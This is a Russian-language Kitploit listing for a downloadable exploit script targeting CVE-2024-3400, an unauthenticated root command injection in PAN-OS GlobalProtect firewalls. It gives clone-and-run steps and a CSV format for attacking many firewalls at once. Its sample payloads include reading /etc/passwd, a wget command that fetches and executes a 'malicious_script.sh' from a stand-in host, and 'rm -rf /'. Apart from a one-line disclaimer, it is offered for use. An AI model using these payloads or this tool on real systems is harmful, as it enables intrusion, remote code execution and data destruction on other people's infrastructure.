Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-3400 — Эксплойт-скрипт для CVE-2024-3400, инъекции команд в PAN-OS GlobalProtect, позволяющей неаутентифицированное удалённое выполнение кода с правами root. Поддерживает эксплуатацию одиночных целей и множественных целей на основе CSV. | Kitploit
Инструменты/GitHubGitHub/yuvvi01/cve-2024-3400
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubyuvvi01/cve-2024-3400

CVE-2024-3400

Эксплойт-скрипт для CVE-2024-3400, инъекции команд в PAN-OS GlobalProtect, позволяющей неаутентифицированное удалённое выполнение кода с правами root. Поддерживает эксплуатацию одиночных целей и множественных целей на основе CSV.

Репозиторий
11512 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Скрипт эксплойта для межсетевого экрана PAN-OS

Этот скрипт предназначен для демонстрации эксплуатации уязвимостей в межсетевых экранах PAN-OS. Он отправляет специально созданную нагрузку на конечную точку API межсетевого экрана для выполнения произвольных команд. Этот эксплойт нацелен на CVE-2024-3400, уязвимость внедрения команд в функции GlobalProtect программного обеспечения Palo Alto Networks PAN-OS для определенных версий PAN-OS. Отдельные конфигурации функций могут позволить неаутентифицированному злоумышленнику выполнять произвольный код с правами root на межсетевом экране.

Примечание: Пожалуйста, убедитесь, что вы используете этот скрипт только в законных и этических целях и только на машинах, на которых вам разрешено проводить тестирование.

Использование

Чтобы использовать этот проект, выполните следующие шаги:

  1. Клонируйте этот репозиторий:
    root@kitploit:~
    git clone https://github.com/Yuvvi01/CVE-2024-3400
    
    
  2. Перейдите в каталог репозитория:
    root@kitploit:~
    cd CVE-2024-3400
    
    
  3. Установите необходимые модули:
    root@kitploit:~
    pip install -r requirements.txt
    
    
  4. Запустите скрипт Python.
    root@kitploit:~
    python3 exploit.py
    

Следуйте подсказкам, чтобы ввести IP-адрес уязвимого межсетевого экрана PAN-OS и нагрузку для выполнения.

Примеры нагрузок

  1. Вывод содержимого каталога:
    root@kitploit:~
    ls -la
    
    
  2. Вывод содержимого конкретного файла:
    root@kitploit:~
    cat /etc/passwd
    
    
  3. Вывод имени текущего пользователя, вошедшего в систему:
    root@kitploit:~
    whoami
    
    
  4. Скачать файл из интернета (требуется установленный wget или curl):
    root@kitploit:~
    wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
    
    
  5. Будьте очень осторожны с этой командой:
    root@kitploit:~
    rm -rf /
    

Инструкции по безопасному использованию

Проверка SSL-сертификата

Скрипт запросит путь к файлу SSL-сертификата сервера межсетевого экрана PAN-OS. Если путь не указан, скрипт автоматически установит проверку SSL в false, фактически отключив SSL.

Инструкции по работе с CSV-файлом

Этот скрипт позволяет эксплуатировать несколько целей уязвимых межсетевых экранов PAN-OS с помощью CSV-файла. Ниже приведены инструкции по правильному форматированию CSV-файла:

Формат CSV-файла:

CSV-файл должен содержать три столбца:

  • ipaddress: IP-адрес уязвимого межсетевого экрана PAN-OS.

  • payload: Нагрузка для выполнения на межсетевом экране.

  • path/to/root_CA_certificate.pem: Путь к корневому сертификату ЦС (оставьте пустым, если проверка сертификата отключена).

  • Пример CSV-файла:

    root@kitploit:~
    ipaddress,payload,path/to/root_CA_certificate.pem
    192.168.1.1,exploit_payload1,/path/to/certificate.pem
    192.168.1.2,exploit_payload2,
    

Инструкции:

Создайте CSV-файл в указанном формате. Заполните IP-адреса, нагрузки и пути к корневым сертификатам ЦС (если применимо). Убедитесь, что вы указали допустимые пути к корневым сертификатам ЦС, или оставьте поле пустым, если проверка сертификата отключена. Запустите скрипт и при появлении запроса выберите опцию использования CSV-файла.

Ссылки

  • https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/
  • https://security.paloaltonetworks.com/CVE-2024-3400
Скачать инструмент